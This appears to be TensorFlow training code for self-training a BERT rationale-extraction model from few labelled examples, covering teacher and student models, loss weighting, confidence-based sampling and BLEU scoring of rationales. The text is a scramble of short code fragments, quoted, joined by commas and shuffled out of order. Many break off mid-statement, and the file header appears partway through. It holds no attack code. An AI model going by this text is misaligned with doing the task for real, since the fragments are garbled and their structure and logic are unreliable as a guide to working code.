model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier':", "# or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2]", "deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0],", "= {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)),", "X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev =", "unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10,", "out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val =", "models import numpy as np import os, sys import json import nltk import", "1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp'", "#to skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1", "y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": 
X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled'", "for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true),", "y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_)", "= np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro')))", "y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X", "Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus))", "np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0],", "[y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_:", "type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices]", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] 
= X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'],", "loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size],", "> max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3]", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in", "strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "#model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': 
tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"),", "unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in", "'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1)", "res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length,", "different initialization to select best base model based on validation loss best_base_model =", "in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif", "#logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0,", "y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean,", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] 
test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in", "y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in", "verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0],", "negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\":", "model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model", "Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1),", "test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint':", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg'", "= X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs,", "X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev", "u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": 
np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask}", "#.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the", "for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc))", "task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean,", "[1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss],", "'_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101", "in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] =", "in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss,", "return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test,", "[] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] =", "type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:]", "axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc =", "model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): 
model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model", "focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import", "1)) logger.info(\"BLEU-1 score of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2", "model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from", "type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape))", "= tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred']", "y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1)", "if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc,", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out =", "(task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred,", "'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred)", "[0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X", "elif 'joint' in type_: out = 
model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1],", "type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1)", "None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'],", "restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss", "= out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1", "verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1,", "if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else:", "logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. 
max_test_acc", "model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None", "X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))])", "score of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of", "y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx", "rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]),", "(probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if", "\"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:],", "model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if", 
"tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:,", "1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher", "data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict()", "attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "= X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {}", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def", "1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], 
y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5,", "as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score", "hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in", "if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best", "{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\":", "{} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus =", "X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher", 
"y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy", "np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc =", "<NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning. This code base", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher'", "student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0,", "logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss:", "1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info", "103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as", "score of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))])", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] '''", "0: train_size = int((1. 
- valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train =", "0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl'", "axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true,", "rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss =", "loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0,", "indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids':", "labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices =", "(\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_:", "import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from", "len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights =", "on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test", "if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:],", "X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], 
\"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size],", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp'", "= {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales", "== 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1", "UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle from transformers", "if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm'", "{} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {}", "based on validation loss best_base_model = None best_validation_loss = np.inf for counter in", "axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss},", "(probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] =", "sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled 
from", "np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif", "with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights =", "test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding", "out[5] logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best", "max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc", "np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]}", "X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "with valid_split if valid_split 
